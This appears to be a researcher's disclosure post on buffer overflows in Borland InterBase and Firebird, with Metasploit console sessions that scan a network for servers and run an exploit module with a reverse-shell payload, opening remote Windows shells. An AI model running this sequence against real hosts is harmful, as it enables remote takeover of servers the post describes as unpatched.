InterBase/Firebird fun
While developing an exploit module for a buffer overflow vulnerability published by TippingPoint in Borland InterBase, we decided to do a quick look into Borland InterBase code, and unfortunately, the results were not good.
We found about 20 buffer overflow vulnerabilities that affects all versions of Borland InterBase, and some of them also affects the Firebird Relational Database. All remote, trivial to exploit, stack-based buffer overflows.
We contacted both Borland/CodeGear and Firebird developers about these vulnerabilities. After failed attempts to find an email address to report security issues in their products, we tried their bug tracking systems. Borland/CodeGear asked us to send information to their support email address, but we didn't get any further responses. Firebird developers didn't answer to our reports either, but they corrected these vulnerabilities in the latest version of Firebird.
We published the advisories, exploit modules for some of these vulnerabiliities, and an auxiliary scanner module for Metasploit Framework 3.
The auxiliary scanner module searches for running InterBase/Firebird
instances on an address range and retrieves version and implementation of the
InterBase server from InterBase Services Manager.
This auxiliary module
can be used to determine the exact target will be used in an exploitation
scenario.
msf > use auxiliary/scanner/misc/ib_service_mgr_info msf auxiliary(ib_service_mgr_info) > set RHOSTS 192.168.213.0/24 RHOSTS => 192.168.213.0/24 msf auxiliary(ib_service_mgr_info) > run [*] Trying 192.168.213.0 [*] Trying 192.168.213.1 [*] Trying 192.168.213.2 ... [*] Trying 192.168.213.132 IP Address: 192.168.213.132 Version of the InterBase server: WI-V6.0.1.0 Implementation of the InterBase server: InterBase/x86/Windows NT ... [*] Trying 192.168.213.253 [*] Trying 192.168.213.254 [*] Trying 192.168.213.255 [*] Auxiliary module execution completed msf auxiliary(ib_service_mgr_info) >
Using this information, one can select the exact target from one of our published exploit modules.
msf auxiliary(ib_service_mgr_info) > use windows/misc/ib_isc_attach_database msf exploit(ib_isc_attach_database) > set RHOST 192.168.213.132 RHOST => 192.168.213.132 msf exploit(ib_isc_attach_database) > set LHOST 192.168.0.4 LHOST => 192.168.0.4 msf exploit(ib_isc_attach_database) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ib_isc_attach_database) > show targets Exploit targets: Id Name -- ---- 0 Brute Force 1 Borland InterBase WI-V8.1.0.257 2 Borland InterBase WI-V8.0.0.123 3 Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80 4 Borland InterBase WI-V7.0.1.1 5 Borland InterBase WI-V6.5.0.28 6 Borland InterBase WI-V6.0.1.6 7 Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0 8 Borland InterBase WI-V5.5.0.742 9 Borland InterBase WI-V5.1.1.680 10 Debug msf exploit(ib_isc_attach_database) > set TARGET 7 TARGET => 7 msf exploit(ib_isc_attach_database) > exploit [*] Started reverse handler [*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:33891) Microsoft Windows XP [versão 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
The brute force option assumes that ibguard/fbguard is running and tries every available target from an exploit module sequentially.
msf exploit(ib_isc_attach_database) > set TARGET 0 TARGET => 0 msf exploit(ib_isc_attach_database) > exploit [*] Started reverse handler [*] Brute forcing with 10 possible targets [*] Trying target Borland InterBase WI-V8.1.0.257... [*] Trying target Borland InterBase WI-V8.0.0.123... [*] Trying target Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80... [*] Trying target Borland InterBase WI-V7.0.1.1... [*] Trying target Borland InterBase WI-V6.5.0.28... [*] Trying target Borland InterBase WI-V6.0.1.6... [*] Trying target Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0... [*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.4:33942) Microsoft Windows XP [versão 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
It is important to note that all Borland InterBase vulnerabilities published by us were not corrected by the vendor and are present in all (including the latest) versions of their product.